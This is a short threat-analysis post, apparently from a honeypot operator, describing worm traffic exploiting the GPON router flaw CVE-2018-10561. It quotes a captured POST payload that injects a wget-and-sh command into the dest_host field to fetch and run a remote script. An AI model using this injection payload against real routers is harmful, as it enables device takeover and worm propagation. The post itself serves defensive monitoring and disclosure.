In Glastopf logs I see POST requests to /GponForm/diag_Form?images/. These exploitation attempts have started in the last couple weeks, and their intensity ebbs and flows. The attacks are related to CVE-2018-10561, a router vulnerability which came out on 3 May, and the attempts I’ve seen in the last couple days seem the most sophisticated.
Earlier attacks seemed focused on determining whether the vulnerability was present, and dropping further attack code like the MIRAI binaries. That seemed strange to me as those binaries would attack other routers using a different vulnerability, so the worm wouldn’t propagate based on the new vulnerability, simply use the new vulnerability as a starting point to launching other attacks.
Now, I see attacks dropping worms specific to this vulnerability. A graph depicting the relevant action is available here.
The request to the web end point above contains the following POST data:
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=;wget+hxxp://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
I don’t actually have the vulnerable hardware, but this seems to attempt a command injection after using the authentication bypass. The command injection downloads a shell script and executes it. The script tries downloading and executing binaries for ARM, MIPS, MIPS little endian, and ARM7, in turn.
I haven’t reverse engineered the downloaded binaries beyond looking at strings and glancing at logic, but they seem to use the same vulnerability to spread based on that brief analysis. Practice bears this out - lots of IP addresses are making these POST requests. The numbers are waning now, suggesting either that infection has hit a peak and the worm doesn’t attempt to keep spreading, or the worm ended up breaking things…